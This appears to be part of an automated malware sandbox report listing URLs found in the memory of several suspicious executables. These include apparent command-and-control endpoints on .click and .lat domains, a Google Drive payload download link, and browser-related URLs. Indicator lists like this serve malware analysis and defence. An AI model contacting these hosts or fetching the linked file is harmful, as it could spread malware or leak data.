Source: 5cda6c90d7.exe, 0000000C.00000003.2659069201.00000000017BB000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2773819917.00000000017B9000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2635795252.00000000017BB000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2773960939.00000000017BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cheapptaxysu.click/api8
Source: 5cda6c90d7.exe, 0000000C.00000003.2659546736.00000000017DA000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2659069201.00000000017BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cheapptaxysu.click/apiu
Source: 5cda6c90d7.exe, 0000000C.00000003.2659546736.00000000017DA000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2659069201.00000000017BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cheapptaxysu.click/apiw
Source: 5cda6c90d7.exe, 0000000C.00000003.2860832487.00000000017D2000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000002.2872096119.00000000017D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cheapptaxysu.click/apiz2
Source: 5cda6c90d7.exe, 0000000C.00000002.2878360728.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2766963059.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2800855972.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2838754343.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2802169090.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2741012427.0000000005E31000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2741357547.0000000005E32000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2795190281.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2815002242.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2767444886.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cheapptaxysu.click:443/api
Source: 5cda6c90d7.exe, 0000000C.00000003.2800855972.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2838754343.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2802169090.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2795190281.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2815002242.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cheapptaxysu.click:443/apibW4Wyy
Source: 5cda6c90d7.exe, 0000000C.00000002.2878360728.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2838754343.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2815002242.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cheapptaxysu.click:443/apipref(
Source: 5cda6c90d7.exe, 0000000C.00000002.2870509764.00000000017B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cheapptaxysu.click:443/apiy
Source: cc6f25572f.exe, 00000011.00000003.2766911611.000001D6698F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chrome.goo2
Source: cc6f25572f.exe, 00000011.00000003.2767366866.000001D66991B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore
Source: cc6f25572f.exe, 00000010.00000003.2756924171.000002B0C1B4A000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000003.2754299828.000002B0C1B19000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000003.2754614693.000002B0C1B36000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000003.2756665074.000002B0C1B43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore%
Source: cc6f25572f.exe, 00000011.00000003.2767408832.000001D66991F000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2766984113.000001D66991A000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767366866.000001D66991B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstoreLC
Source: cc6f25572f.exe, 00000010.00000003.2756451385.000002B0C1B21000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000003.2756608703.000002B0C1B27000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000003.2755467748.000002B0C1B21000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000003.2756871989.000002B0C1B2E000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000003.2754299828.000002B0C1B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstoreR
Source: cc6f25572f.exe, 00000010.00000003.2756451385.000002B0C1B21000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000003.2756608703.000002B0C1B27000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000003.2755467748.000002B0C1B21000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000003.2756871989.000002B0C1B2E000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000003.2754299828.000002B0C1B19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstorec
Source: cc6f25572f.exe, 00000011.00000003.2766797750.000001D669919000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2766596417.000001D669913000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstorecC
Source: chrome.exe, 00000024.00000003.3307931299.00001D5C002D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000024.00000003.3307959777.00001D5C002E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/cr/report
Source: cc6f25572f.exe, 00000011.00000003.2767366866.000001D66991B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: cc6f25572f.exe, 00000011.00000003.2766661259.000001D669926000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2766596417.000001D669913000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767237610.000001D66992A000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767999680.000001D66992A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crxE0D7
Source: cc6f25572f.exe, 00000011.00000003.2767999680.000001D669920000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767408832.000001D66991F000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2766984113.000001D66991A000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767366866.000001D66991B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crxw
Source: cd2469328d.exe, 0000000B.00000003.2663747077.0000000003531000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3652093995.00000000060CB000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3796121165.00000000055AB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: cd2469328d.exe, 0000000B.00000002.2793903700.0000000003530000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2766963059.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2800855972.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2838754343.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2802169090.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2795190281.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2815002242.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2767444886.0000000005E4A000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3652093995.00000000060CB000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3796121165.00000000055AB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: b05c9e01f3.exe, 00000016.00000002.3059346963.0000000000E61000.00000040.00000001.01000000.00000012.sdmp	String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: b05c9e01f3.exe, 00000016.00000002.3059346963.0000000000E61000.00000040.00000001.01000000.00000012.sdmp	String found in binary or memory: https://curl.se/docs/hsts.html
Source: b6638733e4.exe, 00000013.00000003.2869803204.00000000075CF000.00000004.00001000.00020000.00000000.sdmp, b05c9e01f3.exe, 00000016.00000003.3009363267.0000000007330000.00000004.00001000.00020000.00000000.sdmp, b05c9e01f3.exe, 00000016.00000002.3059346963.0000000000E61000.00000040.00000001.01000000.00000012.sdmp	String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: 142c991362.exe, 00000023.00000003.3812652117.00000000060CE000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3642669886.00000000060CA000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3797060863.0000000000970000.00000004.00000020.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3808072506.0000000000970000.00000004.00000020.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3796848156.0000000000970000.00000004.00000020.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3797424943.0000000000970000.00000004.00000020.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3797257563.0000000000970000.00000004.00000020.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3796698633.0000000000970000.00000004.00000020.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3796355636.000000000096F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discokeyus.lat/
Source: 142c991362.exe, 00000023.00000003.3772333393.0000000001931000.00000004.00000020.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3787545169.0000000001936000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discokeyus.lat/.
Source: 142c991362.exe, 0000002C.00000003.3796205694.00000000054B1000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3796586628.00000000054B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://discokeyus.lat/4
Source: 142c991362.exe, 0000002C.00000003.3797060863.0000000000970000.00000004.00000020.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3808072506.0000000000970000.00000004.00000020.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3756684454.000000000096F000.00000004.00000020.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3796848156.0000000000970000.00000004.00000020.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3714331641.000000000096F000.00000004.00000020.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3797424943.0000000000970000.00000004.00000020.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3797257563.0000000000970000.00000004.00000020.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3796698633.0000000000970000.00000004.00000020.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3796355636.000000000096F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discokeyus.lat/?
Source: 142c991362.exe, 0000002C.00000003.3796205694.00000000054B1000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3752049278.00000000054B8000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3757001497.00000000054B8000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3796586628.00000000054B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://discokeyus.lat/The
Source: 142c991362.exe, 0000002C.00000003.3756684454.000000000096F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discokeyus.lat/api
Source: 142c991362.exe, 0000002C.00000003.3796355636.000000000096F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discokeyus.lat/apiQ
Source: 142c991362.exe, 0000002C.00000003.3797060863.0000000000970000.00000004.00000020.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3808072506.0000000000970000.00000004.00000020.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3796848156.0000000000970000.00000004.00000020.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3797424943.0000000000970000.00000004.00000020.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3797257563.0000000000970000.00000004.00000020.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3796698633.0000000000970000.00000004.00000020.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3796355636.000000000096F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discokeyus.lat/d
Source: cc6f25572f.exe, 00000011.00000003.2767366866.000001D66991B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/
Source: cc6f25572f.exe, 00000011.00000003.2765856821.000001D6698F7000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2765856821.000001D6698F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
Source: cc6f25572f.exe, 00000011.00000003.2765967670.000001D669910000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2765856821.000001D6698F7000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2765856821.000001D6698F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
Source: cc6f25572f.exe, 00000010.00000003.2753252739.000002B0C1B18000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000003.2753189352.000002B0C1B08000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_defaultF
Source: cc6f25572f.exe, 00000011.00000003.2765967670.000001D669910000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2765856821.000001D6698F7000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2765856821.000001D6698F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
Source: cc6f25572f.exe, 00000010.00000003.2753252739.000002B0C1B18000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000003.2753189352.000002B0C1B08000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default8
Source: cc6f25572f.exe, 00000011.00000003.2767366866.000001D66991B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive-autopush.corp.google.com/
Source: cc6f25572f.exe, 00000011.00000003.2767366866.000001D66991B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-0.corp.google.com/
Source: cc6f25572f.exe, 00000011.00000003.2767366866.000001D66991B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-1.corp.google.com/
Source: cc6f25572f.exe, 00000011.00000003.2767366866.000001D66991B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-2.corp.google.com/
Source: cc6f25572f.exe, 00000011.00000003.2767366866.000001D66991B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-3.corp.google.com/
Source: cc6f25572f.exe, 00000011.00000003.2767366866.000001D66991B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-4.corp.google.com/
Source: cc6f25572f.exe, 00000011.00000003.2767527419.000001D669902000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2767034150.000001D669900000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2766911611.000001D6698FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-5.corp.g
Source: cc6f25572f.exe, 00000011.00000003.2767366866.000001D66991B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-5.corp.google.com/
Source: cc6f25572f.exe, 00000011.00000003.2767366866.000001D66991B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-6.corp.google.com/
Source: cc6f25572f.exe, 00000011.00000003.2766911611.000001D6698F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive-preprod.co
Source: cc6f25572f.exe, 00000010.00000003.2753529340.000002B0C1B03000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive-preprod.corp.googl
Source: cc6f25572f.exe, 00000011.00000003.2767366866.000001D66991B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive-preprod.corp.google.com/
Source: cc6f25572f.exe, 00000011.00000003.2767366866.000001D66991B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive-staging.corp.google.com/
Source: cc6f25572f.exe, 00000011.00000003.2767366866.000001D66991B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: cc6f25572f.exe, 00000010.00000002.2885993899.000002B0C1B55000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000003.2843436830.000002B0C1B55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/%
Source: cc6f25572f.exe, 00000011.00000003.2874665665.000001D66991B000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2893696860.000001D66991C000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000002.2919171490.000001D66990D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/K
Source: cc6f25572f.exe, 00000011.00000003.2765856821.000001D6698F7000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2765856821.000001D6698F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
Source: cc6f25572f.exe, 00000010.00000002.2888013323.00007FF735960000.00000002.00000001.01000000.0000000F.sdmp, cc6f25572f.exe, 00000010.00000000.2731872890.00007FF735960000.00000002.00000001.01000000.0000000F.sdmp, cc6f25572f.exe, 00000011.00000002.2972181574.00007FF735960000.00000002.00000001.01000000.0000000F.sdmp, cc6f25572f.exe, 00000011.00000000.2740743202.00007FF735960000.00000002.00000001.01000000.0000000F.sdmp	String found in binary or memory: https://drive.google.com/uc?id=
Source: cc6f25572f.exe, 00000010.00000003.2843436830.000002B0C1B26000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000002.2919171490.000001D66990D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download
Source: cc6f25572f.exe, 00000010.00000003.2843436830.000002B0C1B3B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=downloadJ
Source: cc6f25572f.exe, 00000010.00000002.2888013323.00007FF735960000.00000002.00000001.01000000.0000000F.sdmp, cc6f25572f.exe, 00000010.00000000.2731872890.00007FF735960000.00000002.00000001.01000000.0000000F.sdmp, cc6f25572f.exe, 00000011.00000002.2972181574.00007FF735960000.00000002.00000001.01000000.0000000F.sdmp, cc6f25572f.exe, 00000011.00000000.2740743202.00007FF735960000.00000002.00000001.01000000.0000000F.sdmp	String found in binary or memory: https://drive.google.com/uc?id=URL:
Source: cc6f25572f.exe, 00000010.00000002.2885993899.000002B0C1B1A000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000003.2843354005.000002B0C1B80000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000003.2863634118.000002B0C1B77000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000003.2843436830.000002B0C1B26000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000002.2885993899.000002B0C1B61000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2917808778.000001D669972000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2893918748.000001D66997B000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000002.2919515707.000001D669972000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2873269821.000001D669978000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2873026803.000001D66996D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: cc6f25572f.exe, 00000011.00000003.2874665665.000001D66993D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/7
Source: cc6f25572f.exe, 00000010.00000002.2885993899.000002B0C1B1A000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000003.2843436830.000002B0C1B26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/L
Source: cc6f25572f.exe, 00000011.00000003.2873026803.000001D66996D000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2874665665.000001D669960000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download
Source: cc6f25572f.exe, 00000011.00000003.2873269821.000001D669978000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2873026803.000001D66996D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download1
Source: cc6f25572f.exe, 00000011.00000003.2917808778.000001D669972000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2893918748.000001D66997B000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000002.2919515707.000001D669972000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2873269821.000001D669978000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2873026803.000001D66996D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download2
Source: cc6f25572f.exe, 00000010.00000003.2843236422.000002B0C1BA8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=downloadb
Source: cc6f25572f.exe, 00000011.00000003.2917808778.000001D669972000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2893918748.000001D66997B000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000002.2919515707.000001D669972000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2873269821.000001D669978000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2873026803.000001D66996D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=downloadi
Source: cc6f25572f.exe, 00000011.00000003.2873269821.000001D669978000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2873026803.000001D66996D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=downloads
Source: cc6f25572f.exe, 00000011.00000003.2917808778.000001D669972000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2893918748.000001D66997B000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000002.2919515707.000001D669972000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2873269821.000001D669978000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2873026803.000001D66996D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/e
Source: cd2469328d.exe, 0000000B.00000003.2611942159.000000000357C000.00000004.00000800.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000003.2613062845.000000000357A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2691063624.0000000005E7D000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2691395033.0000000005E7A000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3531502589.000000000610B000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3528793955.000000000610E000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3531742688.000000000610B000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3626433817.00000000054F9000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3626713720.00000000054F7000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3627288446.00000000054F7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: cd2469328d.exe, 0000000B.00000003.2611942159.000000000357C000.00000004.00000800.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000003.2613062845.000000000357A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2691063624.0000000005E7D000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2691395033.0000000005E7A000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3531502589.000000000610B000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3528793955.000000000610E000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3531742688.000000000610B000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3626433817.00000000054F9000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3626713720.00000000054F7000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3627288446.00000000054F7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: cd2469328d.exe, 0000000B.00000003.2611942159.000000000357C000.00000004.00000800.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000003.2613062845.000000000357A000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2691063624.0000000005E7D000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2691395033.0000000005E7A000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3531502589.000000000610B000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3528793955.000000000610E000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 00000023.00000003.3531742688.000000000610B000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3626433817.00000000054F9000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3626713720.00000000054F7000.00000004.00000800.00020000.00000000.sdmp, 142c991362.exe, 0000002C.00000003.3627288446.00000000054F7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
